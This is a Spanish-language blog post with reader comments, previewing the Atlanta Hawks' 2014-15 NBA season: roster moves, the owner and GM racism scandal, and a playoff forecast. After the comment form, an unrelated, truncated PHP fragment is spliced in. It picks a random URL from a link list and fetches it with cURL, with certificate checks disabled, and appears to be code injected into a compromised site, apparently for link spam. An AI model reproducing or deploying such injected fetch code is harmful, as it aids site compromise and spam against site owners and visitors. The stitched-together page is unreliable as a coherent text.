Atlanta Hawks 2014-2015: Buen viaje lleven…

01 de October de 2014 por TheDeerHunter

…Como descanso dejan. Nos referimos obviamente al propietario Bruce Levenson y a su lacayo Danny Ferry, que “hacen mutis por el foro” tras el último incidente racista en la liga. Les pedíamos fichar a gente como Monroe o Dragic pero, permitiéndose el lujo de despreciar a Luol Deng por sus orígenes, las incorporaciones no suponen ningún salto cualitativo y para más inri el verano ha dejado un legado de animadversión por parte de muchos agentes libres hacia una franquicia que no tiene culpa. El mejor fichaje será Al Horford siempre que logre mantenerse sano toda la campaña.

Movimientos clave

Según cierto colega “el último despropósito de Ferry como GM de los Hawks fue la contratación de Thabo Sefolosha”. Siempre fui defensor del suizo como uno de los mejores especialistas defensivos pero ciertamente su última campaña en Oklahoma ha sido horrenda y entre él y Deng no hay color. En cambio, Kent Bazemore sí cuajó una campaña notable el año pasado en L.A. pero no ha venido a desplazar a un hombre tan consolidado en Atlanta como Korver. El rookie Adreian Payne será muy del gusto del entrenador Mike Budenholzer pero con toda la tralla que tiene por delante tendrá suerte si huele algún minuto. En el mejor de los casos los Hawks mejoran sutilmente la discreta aportación de los hombres que han abandonado la franquicia reforzando de esta manera su segunda unidad.

Qué esperamos de ellos

Los Hawks se han establecido los últimos años como animadores de la primera ronda. Atendiendo a la ambición mostrada este verano no esperamos que los objetivos sean mayores. Seguramente mejorarán sus resultados en la regular del curso pasado pero no tendrán fácil hincarle el diente a un top-4 de la conferencia. Por otro lado la prioridad de la franquicia es resolver el proceso de venta en el que se encuentra inmersa.

Pronóstico

Por encima de las 40 victorias. Primera ronda.

Plantilla

PG: Jeff Teague, Shelvin Mack, Dennis Schröder
SG: Kyle Korver, Kent Bazemore, John Jenkins
SF: DeMarre Carroll, Thabo Sefolosha
PF: Paul Millsap, Mike Scott, Elton Brand, Adreian Payne(R)
C: Al Horford, Pero Antic, Mike Muscala, Dexter Pittman

Bajas: Gustavo Ayón, Cartier Martin (DET), Louis Williams (TOR)

Comenta

8 comentarios a esta entrada

  1. txusma dice:
    #1

    Hombre, yo creo que hay mejora pero ni de lejos la necesaria para aspirar a algo más de lo que llevan haciendo estos últimos años. Como muy bien comenta la previa, el mejor fichaje será Al Horford y Sefolosha, Bazemore y el rookie Payne (best case: Channing Frye?) son una mejora respecto los que se han ido.
    Y ganas de comprobar definitivamente si Schröder es un bluf o necesita más tiempo.

      Citar

  2. Sancho88 dice:
    #2

    Los Kings ofrecieron su pick 8 por Schroeder, y visto lo visto con la cagada que hicieron al elegir a Stauskas, hubiera sido preferible conseguir al alemán. Jugó muy poco el año pasado, pero tiene muchas cualidades y es aún muy joven. Los Hawks como siempre vuelven a ser carne de primera ronda. Típico equipo que en la regular se apañan y se amolda perfectamente a su estilo, pero en Playoffs no les da para pasar ronda. Tienen un juego exterior realmente pobre. Les doy 45 victorias y primera ronda Playoffs

      Citar

  3. Azabel dice:
    #3

    una pena que un jugador como Hardofrd siga metido en una organizacion tan conforme con la mediocridad, no se aburren sus fans de todos los años lo mismo? ni muy buenos ni muy malos, ni una nueva super estrella ni un rookie que realmente ilusione

    con un intento fuerte por alguna estrella, mas la nomina baja y hardford, podria haber funcionado, pero no, para ellos ni siquiera Deng es suficientemente bueno

      Citar

  4. jmpa dice:
    #4

    No me sorprende la oferta de los Kings.
    Desde que dejaron marchar a Thomas se quedaron muy cortitos en el puesto de base.
    La verdad, un movimiento que nunca entendí.
    Darren Collison y Ramon Sessions se supone que deben llevar el timón del equipo. Mal futuro les veo.

    En cuanto a Hawks, suscribo todo lo dicho ya. Carne de primera ronda, como mucho.

      Citar

  5. Hynreck dice:
    #5

    Bazemore!!

      Citar

  6. MagicJohnson32 dice:
    #6

    Unos abonados al club del ni fu ni fa, suficiente para estar en Playoffs pero muy lejos de ser candidato a algo importante, sin contratos mastodónticos pero sin flexibilidad salarial para grandes cosas, con jugadores de nivel pero sin margen de mejora…

    El punto de renunciar a Deng es una buena muestra de que la franquicia no aspira a más de lo que ya es.

    En fin, de acuerdo con el análisis, especialmente con la frase sobre el último despropósito de Ferry 😉

      Citar

  7. portu dice:
    #7

    Les dí por muertos el año pasado y demostraron orgullo, aunque no fue suficiente para sacarles del grupo de ni fú ni fa como bien dice Magic… Este año no los dejaré fuera de playoffs en la porra, pero no me explico qué piezas pueden destcar para poder ilusionar mínimamente a su triste afición. A falta de ver a Bazemore con galones (esta va por Hynreck jejejeje) o a un recuperado J. Jenkins (que apuntaba antes de fastidiarse la espalda a tirador de grandísimo nivel), el nivel ofensivo es muy plano… dependerán de Teague y de la vuelta de Horford, lo cual se antoja muy poco. En defensa pueden hacerse fuertes juntando a Sefolosha y D. Carroll, pero por mucho q se muevan las piezas, el equipo sigue siendo muuuuuy triste.

      Citar

  8. Ruxixon dice:
    #8

    Sinceramente,creo que la opinión de Ferry se ha magnificado teniendo el recuerdo de lo de Sterling tan reciente.Lo más curioso de todo es que parece que Levenson ha sido parte activa en este revuelo y ha querido inmolarse en beneficio propio,y es que si Sterling se ha llenado los bolsillos siendo un racista…¿la presión de la NBA favorecerá encontrar comprador?No hay que olvidar su interés en vender esa participación en los Hawks viene de hace tiempo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>